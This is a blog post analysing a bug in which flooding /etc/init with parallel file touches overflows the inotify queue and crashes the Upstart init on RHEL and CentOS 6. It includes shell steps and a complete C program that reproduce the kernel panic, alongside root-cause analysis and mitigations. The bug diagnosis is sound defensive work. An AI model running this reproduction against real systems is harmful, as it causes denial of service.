
Kill init by touching a bunch of files

source link: http://rachelbythebay.com/w/2014/11/24/touch/


init is a pretty big deal on a Linux box. If you manage to kill it, the machine panics. Everything stops, and if you're lucky, it reboots by itself a few seconds or minutes later. Naturally, you'd like it to be stable and robust so that your machine doesn't go down.

What if I told you I found a way to kill the "Upstart" init in RHEL and CentOS 6 with just a bunch of "touch" commands? Yep, it's true. You can even reproduce it in qemu. In fact, I had to do it in there in order to get these screenshots.

Step 1: Create a new directory under /etc/init. I called mine "kill.the.box".

Step 2: Fill that path with a few hundred or thousand files. I used 'touch $(seq 1 1000)' but do it however you like.

Step 3: Kick off a bunch of changes to those files in parallel. As you can see here, I started 10 instances of 'touch', each one receiving 7 copies of the list of files thanks to the shell expanding all of those asterisks.

[screenshot: ten parallel 'touch' jobs hammering the files -- "One you lock the target, two you bait the line"]
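If you'd rather have this scripted than typed, here's a rough C equivalent of steps 1 through 3 (plus the waiting). The directory name matches the one above; the file and worker counts are arbitrary, and it goes without saying that this belongs in a disposable VM, not on a machine you care about.

/* flood.c: rough equivalent of steps 1-3. Run it in a throwaway VM. */
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <utime.h>

#define DIR_PATH "/etc/init/kill.the.box"
#define NFILES   1000
#define NWORKERS 10

int main(void)
{
    char path[sizeof(DIR_PATH) + 16];
    int i, j, fd;

    /* Step 1: a new directory under /etc/init. */
    mkdir(DIR_PATH, 0755);

    /* Step 2: fill it with a bunch of files. */
    for (i = 1; i <= NFILES; i++) {
        snprintf(path, sizeof(path), DIR_PATH "/%d", i);
        fd = open(path, O_CREAT | O_WRONLY, 0644);
        if (fd >= 0)
            close(fd);
    }

    /* Step 3: several workers re-touching every file as fast as
     * possible, generating inotify events faster than init can
     * drain them. */
    for (i = 0; i < NWORKERS; i++) {
        if (fork() == 0) {
            for (;;) {
                for (j = 1; j <= NFILES; j++) {
                    snprintf(path, sizeof(path), DIR_PATH "/%d", j);
                    utime(path, NULL); /* same effect as touch(1) */
                }
            }
        }
    }

    /* Step 4: wait. */
    for (;;)
        pause();
}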

Step 4: Wait. It takes a little while to happen on the emulated machine, at least. Bare metal might be more forthcoming. You will be rewarded with the following:

[screenshot: the machine panicking after init dies -- "Three you slowly spread the net"]

Step 5: There is no step 5 unless you're curious. I rigged up syslog in the emulated machine to fling data outward so I could see it with tcpdump on my actual workstation machine. With that, you can finally see why the box dies.

[screenshot: the syslog output captured with tcpdump -- "Four you crash the box"]

Here's the text transcribed for the sake of those web indexing sites...

Nov 23 23:27:49 centos6 init: watch.c:202: Assertion failed in nih_watch_handle_by_wd: wd >= 0
Nov 23 23:27:49 centos6 init: Caught abort, core dumped

Actually understanding this takes a bit of digging. First, you learn that init on RHEL and CentOS 6 is something called Upstart, and that it uses something called "libnih" to do a lot of work. One of the utilities provided by that library is the ability to watch files and directories for changes.

In this case, init uses libnih's "watch" feature to keep tabs on its configuration files, so it knows when they change. If you poke around in the source, you can find that it actually registers watches for the entire directory containing each config file for various reasons, so it winds up following /etc (due to /etc/init.conf) and /etc/init (its "job dir").
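In raw inotify terms (this is not libnih's actual API, and the event mask is my guess at roughly what init would ask for), that registration looks something like:

#include <stdio.h>
#include <sys/inotify.h>

int main(void)
{
    int fd, wd_conf, wd_jobs;

    /* One inotify instance covers every directory init watches. */
    fd = inotify_init();
    if (fd < 0) {
        perror("inotify_init");
        return 1;
    }

    /* Watch the directory holding /etc/init.conf, and the job dir.
     * Each call hands back a watch descriptor naming that watch. */
    wd_conf = inotify_add_watch(fd, "/etc",
            IN_CREATE | IN_DELETE | IN_MODIFY | IN_ATTRIB | IN_MOVE);
    wd_jobs = inotify_add_watch(fd, "/etc/init",
            IN_CREATE | IN_DELETE | IN_MODIFY | IN_ATTRIB | IN_MOVE);

    printf("/etc is wd %d, /etc/init is wd %d\n", wd_conf, wd_jobs);
    return 0;
}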

This takes us down into libnih. It opens an inotify file descriptor and tells the kernel what the caller (Upstart's init) wants to see. Then it waits around to receive updates from the kernel on that descriptor. It takes the raw data it reads, aligns a "struct inotify_event" over that buffer, and reads out the result.

One of the fields in that buffer is "wd" -- the watch descriptor. This is an opaque number you get from the kernel when you set up a watch. That is, inotify_add_watch() might return 4, and then later, the struct you get back will have 4 in the "wd" field. Easy enough.

libnih's consumer of this data then has the actual line of code which causes things to die. It asserts that "wd" is greater than or equal to 0. Normally, that would be true, but here it obviously isn't. The assert fires a SIGABRT, init goes down, and the system goes with it.
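Sketched without libnih, the receiving side looks roughly like this. The assert() at the bottom stands in for the nih_assert at watch.c:202, and a wd of -1 is exactly what trips it:

#include <assert.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/inotify.h>

/* Drain one read()'s worth of events from an inotify fd, the way
 * libnih's loop does: overlay struct inotify_event on the raw bytes
 * and step through them. Pairs with the registration sketch above. */
static void drain_events(int fd)
{
    /* Aligned buffer, as the inotify(7) man page recommends. */
    char buf[4096] __attribute__((aligned(8)));
    ssize_t len = read(fd, buf, sizeof(buf));
    ssize_t off = 0;

    while (off < len) {
        struct inotify_event *ev = (struct inotify_event *)(buf + off);

        /* Stand-in for the nih_assert in nih_watch_handle_by_wd.
         * On a queue overflow the kernel sends wd == -1, this fires,
         * SIGABRT follows, and if you're init, the box goes down. */
        assert(ev->wd >= 0);

        printf("wd=%d mask=0x%08x name=%s\n", ev->wd,
               ev->mask, ev->len ? ev->name : "(none)");
        off += sizeof(*ev) + ev->len;
    }
}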

What's going on from here requires leaving userspace behind and going into the kernel code. inotify itself has the concept of a "notification overflow". When you first create an inotify instance, it creates an event that already has all of the flags set up to say "hey, something went wrong". This way, the memory is already allocated and is ready to roll should it need it later.

If for some reason you manage to fill up the event queue and it needs to write something more, it will then send you that prepopulated event. It's not like a normal event: its "mask" is FS_Q_OVERFLOW. You're supposed to notice that and presumably treat it differently. Unfortunately, libnih barrels on ahead and I get fodder for another post.
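For contrast, here's roughly what a defensive consumer would check at the top of that loop, before trusting anything else in the event. FS_Q_OVERFLOW is the kernel-internal name; userspace sees it as IN_Q_OVERFLOW. The helper here is mine, not something libnih provides:

#include <stdio.h>
#include <sys/inotify.h>

/* Returns nonzero if this event is the kernel's overflow marker.
 * Call it before looking at ev->wd: on overflow, wd is -1 by design
 * and events were dropped, so the sane move is to rescan the watched
 * directories rather than abort. */
static int is_overflow(const struct inotify_event *ev)
{
    if (ev->mask & IN_Q_OVERFLOW) {
        fprintf(stderr, "inotify queue overflowed; resync needed\n");
        return 1;
    }
    return 0;
}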

So where does the negative value for "wd" (the one tripping the assert) come from? Just eyeballing the kernel code for "copy_event_to_user" shows me a likely source:

/* we get the inotify watch descriptor from the event private data */
spin_lock(&event->lock);
fsn_priv = fsnotify_remove_priv_from_event(group, event);
spin_unlock(&event->lock);
 
if (!fsn_priv)
	inotify_event.wd = -1;

In a nutshell, when there's private data, get the wd value from it, otherwise set it to -1. We can be fairly certain there's no private data for this pseudo-event because of a nice comment back in fsnotify_add_notify_event where it actually detects the overflow and goes into fallback mode:

/* sorry, no private data on the overflow event */
priv = NULL;

(Note: I've only eyeballed the kernel part. It might be off a bit.)

It's starting to make sense. You flood the filesystem with changes, such that inotify has a lot to say. You do it faster than the events can be consumed, so the queue fills up. The kernel then fires off a notification about the overflow, which has no private data by design, and that yields a message to userspace with wd set to -1. libnih asserts that wd must be non-negative (>= 0), so the assert fires, the program dies, and the box goes with it.

Given all of this, the right approach would seem to be a patch to libnih so it notices the warning given by the kernel and does something different. Or, maybe, some kind of option to let the ultimate consumer (init, in this case) get a message without being brutally slain by the assert.

Of course, this already happened: someone wrote a patch... in 2011.

Yep, really. Go look.

That said, the patch was rejected, and that's that. The bug lives on.

I should point out that this is not theoretical. I went through all of the above because some real machines hit this for some reason. I don't have access to them, so I had to work backwards from just the message logged by init. Then I worked forwards with a successful reproduction case to get to this point. I have no idea what the original machines are doing to make this fire, but it's probably something bizarre like spamming /etc with whatever kinds of behavior will generate those inotify events libnih asked to see.

Let me say this again: this happens in the wild. The "touch * * *..." repro looks contrived, because, well, that's the whole point of a repro.

If you're wondering how big the inotify queue is, well, it's probably 16384 on your machine. Run "sysctl fs.inotify.max_queued_events" to see exactly what it is. If you're thinking you can raise that to avoid the possibility of hitting the bug, you're probably right, but not necessarily. It only gets used when the inotify instance is set up.

group = inotify_new_group(inotify_max_queued_events);

So, in all likelihood, init will be running with the old value if you raise it later. You can try to get init to re-exec itself and hopefully establish new watches, or try to get that value raised via the kernel command line so it's already set to a higher value when init shows up. Or you could edit fs/notify/inotify/inotify_user.c. Whatever.
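The same number is visible in /proc if you'd rather have a program check it. Just remember that, per the kernel line above, an inotify instance samples the value when it's created, so a long-running init keeps whatever was in force when it started:

#include <stdio.h>

/* Print fs.inotify.max_queued_events straight from /proc. */
int main(void)
{
    FILE *f = fopen("/proc/sys/fs/inotify/max_queued_events", "r");
    int limit;

    if (!f || fscanf(f, "%d", &limit) != 1) {
        perror("max_queued_events");
        return 1;
    }
    fclose(f);

    printf("inotify queue limit: %d events\n", limit);
    return 0;
}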

Of course, it would be far better for libnih to be patched to handle this and for a new release to be pushed to RHEL, CentOS and whatever else, but what are you going to do?

